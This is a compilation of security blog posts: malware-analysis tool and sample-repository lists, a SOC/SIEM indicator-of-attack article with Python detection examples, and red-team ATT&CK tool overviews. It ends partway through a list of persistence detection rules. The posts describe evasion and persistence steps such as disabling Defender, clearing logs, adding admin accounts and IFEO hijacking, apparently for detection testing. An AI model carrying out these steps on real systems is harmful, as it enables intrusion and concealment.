  • cuckoo-modified-api – A Python API used to control a cuckoo-modified sandbox.
  • DeepViz – Multi-format file analyzer with machine-learning classification.
  • detux – A sandbox developed to do traffic analysis of Linux malwares and capturing IOCs.
  • DRAKVUF – Dynamic malware analysis system.
  • – Unpacks, scans and analyzes almost any firmware package.
  • HaboMalHunter – An Automated Malware Analysis Tool for Linux ELF Files.
  • Hybrid Analysis – Online malware analysis tool, powered by VxSandbox.
  • IRMA – An asynchronous and customizable analysis platform for suspicious files.
  • Joe Sandbox – Deep malware analysis with Joe Sandbox.
  • Jotti – Free online multi-AV scanner.
  • Limon – Sandbox for Analyzing Linux Malware.
  • Malheur – Automatic sandboxed analysis of malware behavior.
  • malsub – A Python RESTful API framework for online malware and URL analysis services.
  • Malware config – Extract, decode and display online the configuration settings from common malwares.
  • Malwr – Free analysis with an online Cuckoo Sandbox instance.
  • MASTIFF Online – Online static analysis of malware.
  • – Scan a file, hash or IP address for malware (free).
  • NetworkTotal – A service that analyzes pcap files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware using Suricata configured with EmergingThreats Pro.
  • Noriben – Uses Sysinternals Procmon to collect information about malware in a sandboxed environment.
  • PDF Examiner – Analyse suspicious PDF files.
  • ProcDot – A graphical malware analysis tool kit.
  • Recomposer – A helper script for safely uploading binaries to sandbox sites.
  • Sand droid – Automatic and complete Android application analysis system.
  • SEE – Sandboxed Execution Environment (SEE) is a framework for building test automation in secured Environments.
  • VirusTotal – Free online analysis of malware samples and URLs
  • Visualize_Logs – Open source visualization library and command line tools for logs. (Cuckoo, Procmon, more to come…)
  • Zeltser’s List – Free automated sandboxes and services, compiled by Lenny Zeltser.

Memory Forensics

Tools for dissecting malware in memory images or running systems.

  • BlackLight – Windows/MacOS forensics client supporting hiberfil, pagefile, raw memory analysis.
  • DAMM – Differential Analysis of Malware in Memory, built on Volatility.
  • evolve – Web interface for the Volatility Memory Forensics Framework.
  • FindAES – Find AES encryption keys in memory.
  • – High speed memory analysis framework developed in .NET supports all Windows x64, includes code integrity and write support.
  • Muninn – A script to automate portions of analysis using Volatility, and create a readable report.
  • Rekall – Memory analysis framework, forked from Volatility in 2013.
  • TotalRecall – Script based on Volatility for automating various malware analysis tasks.
  • VolDiff – Run Volatility on memory images before and after malware execution, and report changes.
  • Volatility – Advanced memory forensics framework.
  • VolUtility – Web Interface for Volatility Memory Analysis framework.
  • WDBGARK – WinDBG Anti-RootKit Extension.
  • WinDbg – Live memory inspection and kernel debugging for Windows systems.

Windows Artifacts

  • AChoir – A live incident response script for gathering Windows artifacts.
  • python-evt – Python library for parsing Windows Event Logs.
  • python-registry – Python library for parsing registry files.
  • RegRipper (GitHub) – Plugin-based registry analysis tool.

Storage and Workflow

  • Aleph – Open Source Malware Analysis Pipeline System.
  • CRITs – Collaborative Research Into Threats, a malware and threat repository.
  • FAME – A malware analysis framework featuring a pipeline that can be extended with custom modules, which can be chained and interact with each other to perform end-to-end analysis.
  • Malwarehouse – Store, tag, and search malware.
  • Polichombr – A malware analysis platform designed to help analysts to reverse malwares collaboratively.
  • stoQ – Distributed content analysis framework with extensive plugin support, from input to output, and everything in between.
  • Viper – A binary management and analysis framework for analysts and researchers.

Malware samples

Malware samples collected for analysis.

  • Clean MX – Realtime database of malware and malicious domains.
  • Contagio – A collection of recent malware samples and analyses.
  • Exploit Database – Exploit and shellcode samples.
  • Malshare – Large repository of malware actively scraped from malicious sites.
  • MalwareDB – Malware samples repository.
  • Open Malware Project – Sample information and downloads. Formerly Offensive Computing.
  • Ragpicker – Plugin based malware crawler with pre-analysis and reporting functionalities
  • theZoo – Live malware samples for analysts.
  • Tracker h3x – Aggregator for malware corpus trackers and malicious download sites.
  • ViruSign – Malware database of samples detected by many anti-malware programs except ClamAV.
  • VirusShare – Malware repository, registration required.
  • VX Vault – Active collection of malware samples.
  • Zeltser’s Sources – A list of malware sample sources put together by Lenny Zeltser.
  • Zeus Source Code – Source for the Zeus trojan leaked in 2011.

Domain Analysis

Inspect domains and IP addresses.

  • – Community based IP blacklist service.
  • boomerang – A tool designed for consistent and safe capture of off network web resources.
  • Cymon – Threat intelligence tracker, with IP/domain/hash search.
  • – One click tool to retrieve as much metadata as possible for a website and to assess its good standing.
  • Dig – Free online dig and other network tools.
  • dnstwist – Domain name permutation engine for detecting typo squatting, phishing and corporate espionage.
  • IPinfo – Gather information about an IP or domain by searching online resources.
  • Machinae – OSINT tool for gathering information about URLs, IPs, or hashes. Similar to Automator.
  • mailchecker – Cross-language temporary email detection library.
  • MaltegoVT – Maltego transform for the VirusTotal API. Allows domain/IP research, and searching for file hashes and scan reports.
  • Multi rbl – Multiple DNS blacklist and forward confirmed reverse DNS lookup over more than 300 RBLs.
  • NormShield Services – Free API Services for detecting possible phishing domains, blacklisted ip addresses and breached accounts.
  • SpamCop – IP based spam block list.
  • SpamHaus – Block list based on domains and IPs.
  • Sucuri SiteCheck – Free Website Malware and Security Scanner.
  • Talos Intelligence – Search for IP, domain or network owner. (Previously SenderBase.)
  • TekDefense Automater – OSINT tool for gathering information about URLs, IPs, or hashes.
  • URLQuery – Free URL Scanner.
  • Whois – DomainTools free online whois search.
  • Zeltser’s List – Free online tools for researching malicious websites, compiled by Lenny Zeltser.
  • Zscaler Zulu – Zulu URL Risk Analyzer.


Most Important Reverse Engineering Books

Documents and Shellcode

Analyze malicious JS and shellcode from PDFs and Office documents. See also the browser malware section.

  • AnalyzePDF – A tool for analyzing PDFs and attempting to determine whether they are malicious.
  • box-js – A tool for studying JavaScript malware, featuring JScript/WScript support and ActiveX emulation.
  • diStorm – Disassembler for analyzing malicious shellcode.
  • JS Beautifier – JavaScript unpacking and deobfuscation.
  • JS Deobfuscator – Deobfuscate simple JavaScript that uses eval or document.write to conceal its code.
  • libemu – Library and tools for x86 shellcode emulation.
  • malpdfobj – Deconstruct malicious PDFs into a JSON representation.
  • OfficeMalScanner – Scan for malicious traces in MS Office documents.
  • olevba – A script for parsing OLE and OpenXML documents and extracting useful information.
  • Origami PDF – A tool for analyzing malicious PDFs, and more.
  • PDF Tools – pdfid, pdf-parser, and more from Didier Stevens.
  • PDF X-Ray Lite – A PDF analysis tool, the backend-free version of PDF X-RAY.
  • peepdf – Python tool for exploring possibly malicious PDFs.
  • QuickSand – QuickSand is a compact C framework to analyze suspected malware documents to identify exploits in streams of different encodings and to locate and extract embedded executables.
  • Spidermonkey – Mozilla’s JavaScript engine, for debugging malicious JS.

Open Source Threat Intelligence Tool

Harvest and analyze IOCs.

  • AbuseHelper – An open-source framework for receiving and redistributing abuse feeds and threat intel.
  • AlienVault Open Threat Exchange – Share and collaborate in developing Threat Intelligence.
  • Combine – Tool to gather Threat Intelligence indicators from publicly available sources.
  • Fileintel – Pull intelligence per file hash.
  • Hostintel – Pull intelligence per host.
  • IntelMQ – A tool for CERTs for processing incident data using a message queue.
  • IOC Editor – A free editor for XML IOC files.
  • ioc_writer – Python library for working with OpenIOC objects, from Mandiant.
  • Massive Octo Spice – Previously known as CIF (Collective Intelligence Framework). Aggregates IOCs from various lists. Curated by the CSIRT Gadgets Foundation.
  • MISP – Malware Information Sharing Platform curated by The MISP Project.
  • Pulsedive – Free, community-driven threat intelligence platform collecting IOCs from open-source feeds.
  • PyIOCe – A Python OpenIOC editor.
  • RiskIQ – Research, connect, tag and share IPs and domains. (Was PassiveTotal.)
  • threataggregator – Aggregates security threats from a number of sources, including some of those listed below in other resources.
  • ThreatCrowd – A search engine for threats, with graphical visualization.
  • ThreatTracker – A Python script to monitor and generate alerts based on IOCs indexed by a set of Google Custom Search Engines.
  • TIQ-test – Data visualization and statistical analysis of Threat Intelligence feeds.

Other Resources


This list was created with the help of the following awesome people.

Original Post:

Indicator Of Attack(IoA’s) And Activities – SOC/SIEM – A Detailed Explanation


What is an Indicator of Attack (IOA)

IoAs are events that can reveal an active attack before indicators of compromise become visible. Using IoAs provides a way to shift from reactive cleanup and recovery to a proactive mode, where attackers are disrupted and blocked before they achieve their goal, such as data theft, ransomware or exploitation.

IOAs focus on detecting the intent of what an attacker is trying to accomplish, regardless of the malware or exploit used in an attack. Just like AV signatures, an IOC-based detection approach cannot detect the increasing threats from malware-free intrusions and zero-day exploits. As a result, next-generation security solutions are moving to an IOA-based approach.

10 Indicators of attack (IoAs)

The following common attack activities can be used, individually or in combination, to diagnose active attacks:

1) Internal hosts with bad destinations

Internal hosts communicating with known bad destinations or to a foreign country where you don’t conduct business.


An example of an HP ArcSight dashboard showing client hosts communicating with threat feeds (IP, domain, URL) from the “” website.


Example of Global Threat Intelligence from McAfee

2) Internal hosts with non-standard ports

Internal hosts communicating with external hosts using non-standard ports or protocol/port mismatches, such as sending command shells (SSH) rather than HTTP or HTTPS traffic over ports 80 and 443, the default web ports.


Example of an internal host using 21 (FTP), 445 (SMB), 137 (NETBIOS-NS) and 135 (RPC) to the Internet

3) Public Servers/DMZ to Internal hosts

Public servers or demilitarized zone (DMZ) hosts communicating with internal hosts. This allows leapfrogging from the outside to the inside and back, permitting data exfiltration and remote access to assets over RDP (Remote Desktop Protocol), Radmin or SSH.


An example of a report that monitors the top 10 traffic flows from the “DMZ” zone to the “Internal/Client” zone.

From this report, the security analyst should investigate the highlighted servers that communicate with internal hosts via RDP (TCP/3389) and SSH (TCP/22).

4) Off-hour Malware Detection

Alerts that occur outside standard business operating hours (at night or on weekends) could signal a compromised host.


Example of IPS alerts during non-working time (a holiday)

5) Network scans by internal hosts

Network scans by internal hosts communicating with multiple hosts in a short time frame can reveal an attacker moving laterally within the network. This incident is detected by perimeter network defenses such as firewalls and IPS. You must filter the zone/interface to “Internal” to “Internal” only; in future you should also watch “Internal” to “DMZ”. The source may be an insider threat or a compromised host that needs more information about your network (reconnaissance).


Example of a network scans report filtered from the “Internal” zone to the “Internal” zone
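As an added example (not from the original article), the Internal-to-Internal filter and short-time-frame logic of this use case written as a small Python detector over constructed firewall events. The log format, zone names, 60-second window and threshold of 10 distinct destinations are assumptions for illustration; a SIEM applies the same grouping to its normalized connection events. The destination zones to watch are a parameter, so the same function also covers the Internal-to-DMZ case the text recommends adding.

```python
"""Added example: detect the Internal -> Internal scan pattern (one source
contacting many distinct destinations in a short window).  Log format, zone
names and thresholds are assumptions for illustration."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed firewall events, not real traffic:
# "<timestamp> <src_zone> <src_ip> <dst_zone> <dst_ip> <dst_port>"
SAMPLE_LOG = "\n".join(
    # 10.0.1.25 touches 12 different internal hosts on 445 within 12 seconds: a scan
    [f"2018-04-01T10:00:{i:02d} Internal 10.0.1.25 Internal 10.0.2.{10 + i} 445" for i in range(12)]
    # 10.0.1.40 talks to one RDP server ten times: busy, but a single destination
    + [f"2018-04-01T10:01:{i:02d} Internal 10.0.1.40 Internal 10.0.2.10 3389" for i in range(10)]
    # 10.0.1.50 goes to the Internet: outside the Internal -> Internal filter
    + [f"2018-04-01T10:02:{i:02d} Internal 10.0.1.50 External 203.0.113.5 {8000 + i}" for i in range(15)]
    # a DMZ host probing inward belongs to IoA 3, so it is excluded here
    + [f"2018-04-01T10:03:{i:02d} DMZ 192.0.2.10 Internal 10.0.2.{10 + i} 22" for i in range(15)]
    # 10.0.1.60 sweeps the DMZ: reported only when DMZ is a watched destination zone
    + [f"2018-04-01T10:04:{i:02d} Internal 10.0.1.60 DMZ 192.0.2.{20 + i} 80" for i in range(11)]
)


def parse_events(log_text):
    """Split one whitespace-separated event per line into a dict."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src_zone, src_ip, dst_zone, dst_ip, dst_port = line.split()
        events.append({"ts": datetime.fromisoformat(ts), "src_zone": src_zone,
                       "src_ip": src_ip, "dst_zone": dst_zone,
                       "dst_ip": dst_ip, "dst_port": int(dst_port)})
    return events


def detect_internal_scans(log_text, threshold=10, window_seconds=60,
                          dst_zones=("Internal",)):
    """Return {src_ip: max distinct destinations seen within one window} for
    every Internal source that reaches `threshold` or more distinct hosts in
    `dst_zones` inside `window_seconds`."""
    window = timedelta(seconds=window_seconds)
    per_source = defaultdict(list)
    for ev in parse_events(log_text):
        # the zone filter: Internal sources, and only the destination zones we watch
        if ev["src_zone"] != "Internal" or ev["dst_zone"] not in dst_zones:
            continue
        per_source[ev["src_ip"]].append((ev["ts"], ev["dst_ip"]))

    findings = {}
    for src_ip, contacts in per_source.items():
        contacts.sort()
        best = 0
        for i, (start, _) in enumerate(contacts):
            # distinct destinations in the window opening at this event
            seen = {dst for ts, dst in contacts[i:] if ts - start <= window}
            best = max(best, len(seen))
        if best >= threshold:
            findings[src_ip] = best
    return findings


if __name__ == "__main__":
    print(detect_internal_scans(SAMPLE_LOG))
    print(detect_internal_scans(SAMPLE_LOG, dst_zones=("Internal", "DMZ")))
```

The repeated-connection host (10.0.1.40) is deliberately not reported: counting distinct destinations rather than raw events is what separates a scan from a chatty client, and the same distinction keeps the rule quiet for backup or monitoring servers.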

6) Multiple alarm events from a single host

Multiple alarm events from a single host, or duplicate events across multiple machines in the same subnet over a 24-hour period, such as repeated authentication failures. THIS IS A COMMON USE CASE.


Example dashboard monitoring “User Login Failures” from single hosts

Note: login-failure events from e-mail applications on mobile phones can generate more than 500 events per minute. I found this case when a user account's password had expired but the user had not changed the password on their devices.

7) System is reinfected with malware

When a system is reinfected with malware within 5-10 minutes after the infected host is cleaned, the repeated reinfection signals the presence of a rootkit or persistent compromise. This incident may be detected from endpoint protection or anti-virus events.


This is an example malware dashboard.

Detection: You must create at least 3 rules on the SIEM, as follows:

  1. A rule that alerts when an infected host is found, then adds it to the Current Infected Hosts list and the Historical Infected Hosts list (stored for at least 1 week)
  2. A rule that alerts when malware is cleaned from an infected host, then removes it from the Current Infected Hosts list
  3. A rule that alerts when it finds an infected host that is already on the Historical Infected Hosts list within the specified time range. THOSE SYSTEMS SHOULD BE SCANNED/INVESTIGATED FOR MALWARE AGAIN!!!
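The three rules above, as an added example rather than the original article's SIEM configuration, written as one stateful tracker in Python so the interaction between the current and historical lists is visible. The event format, the 10-minute reinfection window and the 7-day retention of the historical list are assumptions for illustration.

```python
"""Added example: the three SIEM rules above as a small stateful tracker
over anti-virus events.  Event format, the 10-minute reinfection window and
7-day history retention are assumptions for illustration."""
from datetime import datetime, timedelta

# Constructed endpoint-protection events, not real data: (timestamp, host, action)
SAMPLE_EVENTS = [
    ("2018-04-01T09:00:00", "wks-a", "infected"),
    ("2018-04-01T09:03:00", "wks-a", "cleaned"),
    ("2018-04-01T09:08:00", "wks-a", "infected"),   # back 5 minutes after cleaning
    ("2018-04-01T09:00:00", "wks-b", "infected"),
    ("2018-04-01T09:05:00", "wks-b", "cleaned"),
    ("2018-04-01T11:30:00", "wks-b", "infected"),   # hours later: a new infection
    ("2018-04-10T09:00:00", "wks-c", "infected"),   # nine days later: older history expired
]


class ReinfectionTracker:
    def __init__(self, reinfection_window=timedelta(minutes=10),
                 history_retention=timedelta(days=7)):
        self.window = reinfection_window
        self.retention = history_retention
        self.current = {}   # Current Infected Hosts list: host -> time detected
        self.history = {}   # Historical Infected Hosts list: host -> last infection or cleaning

    def _expire_history(self, now):
        """Drop historical entries older than the retention period (the "store at least 1 week")."""
        for host, last in list(self.history.items()):
            if now - last > self.retention:
                del self.history[host]

    def process(self, ts, host, action):
        """Apply one event; return the alerts it raises as (type, host) tuples."""
        alerts = []
        self._expire_history(ts)
        if action == "infected":
            # rule 3: host is already on the historical list and came back quickly
            if host in self.history and ts - self.history[host] <= self.window:
                alerts.append(("REINFECTION", host))
            # rule 1: alert and add to both lists
            alerts.append(("INFECTED", host))
            self.current[host] = ts
            self.history[host] = ts
        elif action == "cleaned":
            # rule 2: alert and remove from the current list; history keeps the host
            if self.current.pop(host, None) is not None:
                alerts.append(("CLEANED", host))
                self.history[host] = ts
        return alerts


def run_sample(events=SAMPLE_EVENTS):
    """Feed the sample events in time order; return (alerts, tracker)."""
    tracker = ReinfectionTracker()
    alerts = []
    for ts, host, action in sorted(events):   # correlation rules see events in time order
        alerts.extend(tracker.process(datetime.fromisoformat(ts), host, action))
    return alerts, tracker


if __name__ == "__main__":
    for alert in run_sample()[0]:
        print(*alert)
```

Only wks-a raises the reinfection alert: wks-b is infected again hours after cleaning, which rule 1 reports as an ordinary infection, and by the time wks-c appears the other two hosts have aged out of the historical list.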

8. Multiple Login from different regions

A user account trying to log in to multiple resources within a few minutes from different regions. This is a sign that the user’s credentials have been stolen or that the user is up to mischief.


An example of a correlation rule. The ideal solution may vary based on your network conditions and security policy.

This rule detects events in the “Login” normalization category with an Event Outcome equal to “Success” from multiple source geo-locations within a specified time range, with events grouped by Source User.
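The same correlation rule as an added Python example (not the original article's SIEM rule) over constructed, normalized login events: filter on category and outcome, group by user, and report any window in which one user succeeds from two or more geo-locations. The field layout and the 10-minute window are assumptions for illustration.

```python
"""Added example: the correlation rule described above (Login category,
Success outcome, multiple source geo-locations, grouped by user, within a
time range) over constructed events.  Field layout and the 10-minute window
are assumptions for illustration."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, normalized authentication events, not real data:
# "<timestamp> <category> <user> <outcome> <source_geo>"
SAMPLE_LOGINS = """\
2018-04-01T08:00:00 Login alice Success TH
2018-04-01T08:04:00 Login alice Success DE
2018-04-01T08:10:00 Login bob Success TH
2018-04-01T08:30:00 Login bob Success TH
2018-04-01T09:00:00 Login carol Failure DE
2018-04-01T09:01:00 Login carol Success TH
2018-04-01T12:00:00 Login alice Success US
2018-04-01T12:02:00 Logout alice Success SG
"""


def detect_multi_region_logins(log_text, window_minutes=10, min_regions=2):
    """Return [(user, window_start, regions)] for each cluster of successful
    logins by one user from `min_regions` or more geo-locations inside the window."""
    window = timedelta(minutes=window_minutes)
    per_user = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, category, user, outcome, geo = line.split()
        # the rule's filters: normalization category "Login" and outcome "Success"
        if category != "Login" or outcome != "Success":
            continue
        per_user[user].append((datetime.fromisoformat(ts), geo))

    findings = []
    for user, logins in sorted(per_user.items()):     # "grouped by Source User"
        logins.sort()
        i = 0
        while i < len(logins):
            start = logins[i][0]
            in_window = [(ts, geo) for ts, geo in logins[i:] if ts - start <= window]
            regions = sorted({geo for _, geo in in_window})
            if len(regions) >= min_regions:
                findings.append((user, start, tuple(regions)))
                i += len(in_window)      # do not report the same cluster again
            else:
                i += 1
    return findings


if __name__ == "__main__":
    for user, start, regions in detect_multi_region_logins(SAMPLE_LOGINS):
        print(f"{start} {user} logged in from {', '.join(regions)}")
```

Carol's failed login from DE is ignored on purpose: the rule counts only successful logins, because a failure from a second region is a different use case (repeated failures, IoA 6) and would otherwise make every password-guessing attempt look like a compromised account.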

9. Internal hosts sending a lot of SMTP

E-mail protocols such as SMTP (Simple Mail Transfer Protocol), POP3 and IMAP4 should be monitored. Some malware uses these ports to send information to a suspicious or attacker-controlled server.


Example of an infected client using SMTP (TCP/25)

10. Internal hosts querying External/Internal DNS

Many organizations have internal DNS servers to cache records and serve DNS to internal hosts, and the DHCP configuration sets the primary DNS server to the internal DNS server. If you find that some internal hosts query an external DNS server such as (Google DNS), you should scan those clients for malware.


Some incidents found that an internal host sent many queries to the internal DNS server (> 1,000 events/hour).
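Both checks from this use case, as an added Python example (not the original article's SIEM content), over a constructed DNS query log: clients that resolve through an external resolver instead of the internal one handed out by DHCP, and clients whose hourly query count to the internal resolver exceeds 1,000. The log format, the approved resolver address 10.0.0.53 and the threshold are assumptions for illustration.

```python
"""Added example: two DNS checks from this use case over a constructed query
log: internal clients that resolve through an external resolver instead of
the internal one, and clients whose hourly query count to the internal
resolver exceeds 1,000.  Log format, the approved resolver address and the
threshold are assumptions for illustration."""
from collections import Counter, defaultdict
from datetime import datetime

APPROVED_RESOLVERS = {"10.0.0.53"}   # assumed: the internal caching resolver that DHCP hands out

# Constructed DNS query log, not real traffic: "<timestamp> <client_ip> <resolver_ip> <qname>"
SAMPLE_DNS = "\n".join(
    # ordinary client: a query every three minutes through the internal resolver
    [f"2018-04-01T09:{i:02d}:00 10.0.1.30 10.0.0.53 www.example.com" for i in range(0, 60, 3)]
    # client bypassing the internal resolver and asking Google DNS directly
    + [f"2018-04-01T09:{i:02d}:30 10.0.1.25 8.8.8.8 update.example.net" for i in range(10)]
    # client sending 1,200 queries for distinct names to the internal resolver in one hour
    + [f"2018-04-01T10:{i // 20:02d}:{(i % 20) * 3:02d} 10.0.1.77 10.0.0.53 h{i}.example.org"
       for i in range(1200)]
)


def analyze_dns(log_text, approved=APPROVED_RESOLVERS, per_hour_threshold=1000):
    """Return {"external_resolver": {client: [resolvers]},
               "high_volume": {client: max queries in one hour}}."""
    external = defaultdict(set)
    hourly = Counter()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, resolver, _qname = line.split()
        if resolver not in approved:
            # check 1: the host is not using the resolver DHCP gave it
            external[client].add(resolver)
            continue
        # check 2: bucket queries to the internal resolver per client and hour
        hour = datetime.fromisoformat(ts).replace(minute=0, second=0, microsecond=0)
        hourly[(client, hour)] += 1

    high_volume = {}
    for (client, _hour), count in hourly.items():
        if count > per_hour_threshold:
            high_volume[client] = max(high_volume.get(client, 0), count)
    return {"external_resolver": {c: sorted(r) for c, r in external.items()},
            "high_volume": high_volume}


if __name__ == "__main__":
    print(analyze_dns(SAMPLE_DNS))
```

Run this against the firewall or resolver logs rather than endpoint logs: the first check only works when the internal resolver is the only DNS path allowed outbound, so a client talking to 8.8.8.8 on port 53 is visible at the perimeter whether or not the endpoint agent is healthy.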

Action and Adaptation

Once the IoA is created, people and processes can act while the rich intelligence is distributed. Directly, alerts and thresholds can guide enforcement actions such as quarantine. In near real time, new findings can factor into policy adjustments, authentication requirements, and human response workflows. Within hours and days, findings can influence risk scores, organizational policies, and end-user education. Over longer timelines—weeks and months—organizations can trend and surface anomalies, predict future attacks and adjust sensitivities.


Original Source & Credit:  Sittikorn Sangrattanapitak, CISSP

Also Read:

  1. Intrusion Prevention System(IPS) and Its Detailed Function – SOC/SIEM
  2. Intrusion Detection System (IDS) and Its detailed Function – SOC/SIEM 

Original Post:

Red Team and Open-Source Mitre’s ATT&CK Framework Test Tools


One way to learn how to better defend your enterprise is to train a red team to simulate attacks. The MITRE ATT&CK framework is a very useful collection of threat tactics and techniques for such a team; it classifies and describes a wide range of attacks. To make it even more effective, various commercial and open-source testing tools have been built to complement its schemas.

Adversarial Tactics, Techniques & Common Knowledge

MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target. ATT&CK is useful for understanding security risk against known adversary behavior, for planning security improvements, and verifying defenses work as expected.

Video: Post-Exploit Threat Modeling with ATT&CK




Red Team Automation (RTA)

RTA provides a framework of scripts designed to allow blue teams to test their detection capabilities against malicious tradecraft, modeled after MITRE ATT&CK.

RTA is composed of Python scripts that generate evidence of over 50 different ATT&CK tactics, as well as a compiled binary application that performs activities such as file timestomping, process injection, and beacon simulation as needed.

Where possible, RTA attempts to perform the actual malicious activity described. In other cases, the RTAs emulate all or part of the activity. For example, some lateral movement will by default target the local host (though parameters typically allow for multi-host testing). In other cases, executables such as cmd.exe or python.exe are renamed to make it appear as if a Windows binary is doing non-standard activities.




CALDERA is an automated adversary emulation system that performs post-compromise adversarial behavior within Windows Enterprise networks. It generates plans during operation using a planning system and a pre-configured adversary model based on the Adversarial Tactics, Techniques & Common Knowledge (ATT&CK™) project. These features allow CALDERA to dynamically operate over a set of systems using variable behavior, which better represents how human adversaries perform operations than systems that follow prescribed sequences of actions.



Atomic Red Team

Small and highly portable detection tests mapped to the Mitre ATT&CK Framework.

Our Atomic Red Team tests are small, highly portable detection tests mapped to the MITRE ATT&CK Framework. Each test is designed to map back to a particular tactic. We hope that this gives defenders a highly actionable way to immediately start testing their defenses against a broad spectrum of attacks.




Metta is an information security preparedness tool.

This project uses Redis/Celery, Python, and Vagrant with VirtualBox to do adversarial simulation. This allows you to test (mostly) your host-based instrumentation, but may also allow you to test network-based detection and controls depending on how you set up your Vagrant boxes.





Invoke-Adversary – Simulating Adversary Operations

Invoke-Adversary is a PowerShell script that helps you to evaluate security products and monitoring solutions based on how well they detect advanced persistent threats. I was inspired to write this script after seeing APTSimulator, the excellent tool from Florian Roth.


Update 4/14/2018 – In the original script, 3rd party tools were downloaded by the script automatically. I believe that the original disclaimers were enough, but decided to change it due to the feedback I got, and now the script asks the users to download the 3rd party tools themselves, with additional warnings and hash file checking.

This script is provided AS IS without warranty of any kind.

The script should be used for authorized testing and/or educational purposes only, with no exceptions. By using the script, the Windows system’s security and stability (including but not limited to: password dumps, disabling security features, etc.) may be affected, so DON’T RUN IT ON PRODUCTION systems.

The script is my own, based on other researchers’ public domain knowledge and not related to Microsoft in any form.


“Kill Chain”, or What happens during a targeted cybersecurity attack?

The cybersecurity kill chain is a framework developed by Lockheed Martin for the identification and prevention of cyber intrusion activity. As attacks occur in stages, you as a defender can put optics and controls in place to detect or disrupt the entire process.

The stages of the Kill Chain are:

  • Reconnaissance – an attacker is probing for a weakness or bad configuration
  • Weaponization – an attacker is building a payload that can be delivered to the victim (can be a PDF file or an Office document)
  • Delivery – sending the payload via e-mail, web link or removable media
  • Exploit – the payload executes on the victim’s network
  • Installation – the payload downloads additional remote access tools and installs them to maintain persistence
  • Command and Control – a channel is created between the victim and the attacker
  • Actions – the intended goal is executed (encrypt files, exfiltration of data, etc.)

On top of that model, MITRE, a not-for-profit organization, developed an enhanced model for cyber adversarial behavior, called the “Adversarial Tactics, Techniques, and Common Knowledge” (ATT&CK™) Matrix.

Currently, the MITRE ATT&CK™ Matrix provides the most comprehensive framework for adversarial techniques and tactics that enterprises encounter daily.

Tactic – Description

  • Persistence – Techniques for maintaining a persistent presence on a compromised system
  • Privilege Escalation – Techniques that allow an adversary to obtain a higher level of permissions
  • Defense Evasion – Techniques an adversary may use to evade detection or avoid other defenses
  • Credential Access – Techniques resulting in access to or control over system, domain, or service credentials
  • Discovery – Techniques that allow the adversary to gain knowledge about the system and internal network
  • Lateral Movement – Techniques that enable an adversary to access and control remote systems on a network
  • Execution – Techniques that result in execution of adversary-controlled code on a local or remote system
  • Collection – Techniques used to identify and gather information
  • Exfiltration – Techniques that result in or aid the adversary removing files and information from a target network
  • Command and Control – Techniques that represent how adversaries communicate with systems under their control within a target network


Many companies are using Security Information and Event Management (SIEM), Endpoint Protection Platform (EPP) and Endpoint Detection & Response (EDR) products to monitor and protect their environments. What seems to be missing is a tool that can generate real data that represents real-world targeted attacks.

Invoke-Adversary is a PowerShell script that uses a set of functions to simulate post-compromise adversarial behavior within Windows Enterprise networks.

By using Invoke-Adversary script you can:

  • Assess your security monitoring tools and practices
  • Evaluate Endpoint detection agents


Requirements for deploying:

  • The simplest way to run the script is to open an elevated (run as Administrator) PowerShell ISE window and press F5.
  • The script will start, and the first thing you need to do is read the disclaimer and accept the terms by typing yes.
  • Now you can select any test case by choosing its number on the menu.
  • Choose which test you want to run by choosing its number on the menu.



What are the tactics

Defense Evasion

  • Disable network interface – Disables a network adapter and causes loss of network connectivity
  • Disable Windows Defender AV – Turn off real-time protection, scanning all downloaded files and attachments, behavior monitoring, network protection and privacy mode
  • Add local firewall rule exceptions – Add fictitious rule “Invoke-APT Test Rule” to Windows Advanced Firewall
  • Turn off Windows Firewall – Turn off Windows Advanced Firewall
  • Clear Security Log – clears the security log using wevtutil command

Persistence Tactics

  • Accessibility Features – “Hijack” sethc.exe with cmd.exe using “Image File Execution Options”
  • AppInit DLLs – Adds entry for pserver32.dll under AppInit_DLLs
  • Application Shimming – Create registry value under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{842562ef-8d28-411d-a67d-ab75ef611fe8}.sdb
  • Create local user – A new user (user name is: support_388945a0)
  • Create local Administrator – A new user created (user name is: Lost_337fde69_81a9) and added to local Administrators group
  • Create New Service – new service (WindowsHealth) is created
  • Create New Service (Unquoted Path) – same as previous, just with unquoted path
  • Registry Run Keys [HKLM] – New run key under HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
  • Registry Run Keys [HKCU] – New run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • Scheduled tasks – new scheduled task (OfficeUpdaterA) is created
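The point of running these persistence tests is to confirm that monitoring surfaces each artifact, so here is an added Python example (not part of Invoke-Adversary or the original post) that matches the artifacts named in the list above against constructed event records. The one-line record format "<event_type> <details>" is an assumption rather than any product's schema; the registry paths, service, task and user names come from the test descriptions, and the last sample record is a benign registry write that should not fire.

```python
"""Added example: detection rules for the persistence test cases listed above,
run over constructed event records.  The one-line record format
"<event_type> <details>" is an assumption, not any product's schema; the
registry paths and names come from the test descriptions."""
import re
from collections import Counter

PERSISTENCE_RULES = [
    ("Accessibility Features (IFEO Debugger on sethc.exe)",
     r"RegistryValueSet .*\\Image File Execution Options\\sethc\.exe\\Debugger"),
    ("AppInit DLLs",
     r"RegistryValueSet .*\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs"),
    ("Application Shimming (.sdb under Uninstall)",
     r"RegistryValueSet .*\\CurrentVersion\\Uninstall\\\{[0-9a-f-]+\}\.sdb"),
    ("Registry Run Keys [HKLM Policies\\Explorer\\Run]",
     r"RegistryValueSet HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\"),
    ("Registry Run Keys [HKCU]",
     r"RegistryValueSet HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"),
    ("Create New Service", r"^ServiceInstalled "),
    # heuristic: an unquoted binary path that contains a space
    ("Create New Service (Unquoted Path)", r'^ServiceInstalled \S+ path=[^"\s]+ \S'),
    ("Scheduled tasks", r"^ScheduledTaskCreated "),
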